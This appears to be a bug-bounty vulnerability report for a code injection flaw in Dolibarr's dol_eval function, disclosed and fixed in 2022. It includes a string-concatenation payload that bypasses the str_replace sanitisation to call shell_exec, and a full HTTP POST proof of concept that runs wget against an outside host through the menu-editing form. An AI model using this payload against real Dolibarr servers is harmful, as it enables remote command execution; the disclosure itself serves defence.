Code Injection in dolibarr/dolibarr

Valid

Reported on

Feb 28th 2022


Description

Improper php function sanitization, lead to an ability to inject arbitrary PHP code and run arbitrary commands on file system. In the function "dol_eval" in file "dolibarr/htdocs/core/lib/functions.lib.php" dangerous PHP functions are sanitized using "str_replace" and can be bypassed using following code in $s parameter

('she'.'ll_'.'ex'.'ec')('<ANY SYSTEM SHELL COMMAND HERE>')

Proof of Concept

User with rights to add menus to the system can exploit this vulnerabilty with the following request

POST /htdocs/admin/menus/edit.php?action=add&token=84da28fc90b6abc2238f2e0da2e5ee10&menuId=0 HTTP/1.1
Host: <HOST>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:97.0) Gecko/20100101 Firefox/97.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 271
Referer: http://192.168.255.78/dolibarr/htdocs/admin/menus/edit.php?menuId=0&action=create&menu_handler=eldy&backtopage=%2Fdolibarr%2Fhtdocs%2Fadmin%2Fmenus%2Findex.php
Cookie: <COOKIE>
Upgrade-Insecure-Requests: 1

token=84da28fc90b6abc2238f2e0da2e5ee10&menu_handler=all&user=2&type=top&propertymainmenu=testtest&titre=testtest&url=testtest&langs=&position=100&target=&enabled=1&perms=%28%27she%27.%27ll_%27.%27ex%27.%27ec%27%29%28%27wget+https%3A%2F%2F<REDACTED>%27%29&save=Save

Impact

This vulnerability is capable of run arbitrary commands in the file system

We are processing your report and will contact the dolibarr team within 24 hours. 3 months ago
We have contacted a member of the dolibarr team and are waiting to hear back 3 months ago
Laurent Destailleur validated this vulnerability 3 months ago
d3addog has been awarded the disclosure bounty
The fix bounty is now up for grabs
Laurent Destailleur confirmed that a fix has been merged on 2a48dd 3 months ago
Laurent Destailleur has been awarded the fix bounty
to join this conversation